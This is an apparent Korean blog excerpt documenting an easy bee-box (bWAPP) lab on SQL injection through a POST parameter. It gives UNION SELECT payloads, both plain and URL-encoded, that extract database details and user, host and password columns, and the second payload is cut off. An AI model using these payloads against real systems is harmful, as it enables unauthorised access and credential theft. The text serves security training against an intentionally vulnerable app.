난이도 하 post 메소드를 사용하여 요청하고 있기 때문에 URL에 변수가 나타나지 않는다. 버프스위트를 이용해 변수명은 moive이며, 숫자형 값만 입력 받는 것같다. moive의 변수 값에 문자를 삽입하면 오류가 뜨는 것을 확인할 수 있다.
작은따옴표(')또한 오류가 뜨는 것을 확인할 수 있다. 데이터베이스 명, 데이터베이스 서버 버전, 서버에서 MySQL 위치경로를 확인해보기 위해 UNION SELECT구문을 사용하였다. 0 union select null,database(),@@version,@@datadir,null,null,null url 인코딩 ==> 0+union+select+null%2cdatabase()%2c%40%40version%2c%40%40datadir%2cnull%2cnull%2cnull 사용자의 호스트이름, 사용자 이름, 비밀번호를 출력하는 SQL구문을 입력한다. 0 union select null,host,user,password,null,null,nu...
#
beebox
#
POST
#
Select
#
SQLInjection
원문 링크 : SQL 인젝션 - POST/Select
![webhacking.kr 27 [150]](https://mblogthumb-phinf.pstatic.net/MjAyMDAzMjFfNTAg/MDAxNTg0NzYzODU0NDAx.C6WZaAThLqSu7U4_U12Q8kUDYwWIxjOCgkgZEGJu_FIg.U2U3HD9jGdwM91UE5Ms9I4f-Iday8INihWXmhk58cagg.PNG.ster098/image.png?type=w2)
![webhacking.kr 23 [200]](https://mblogthumb-phinf.pstatic.net/MjAyMDAzMjZfMjk3/MDAxNTg1MjAxMzU3NjQ5.vC8sObbxj0QoIke-6poIYETjrnnzGFMwjSnigO4hbCkg.hA2UA4x5kfqBW4h2PAuunn2ouzmpFNumz0kOF60roIQg.PNG.ster098/image.png?type=w2)
![[Vulnerability] - arachni 툴 설치 방법](https://mblogthumb-phinf.pstatic.net/MjAyMDA2MjlfMTc1/MDAxNTkzNDE2NDM3NzM4.IfPyELFZIp966VJGrYyPEQNeRku_YfJsaBb0ZHsHg2Mg.IppUSOI3eS141nBJG1gC5decV4QYHsQgFcgWYE-bxA4g.PNG.ster098/image.png?type=w2)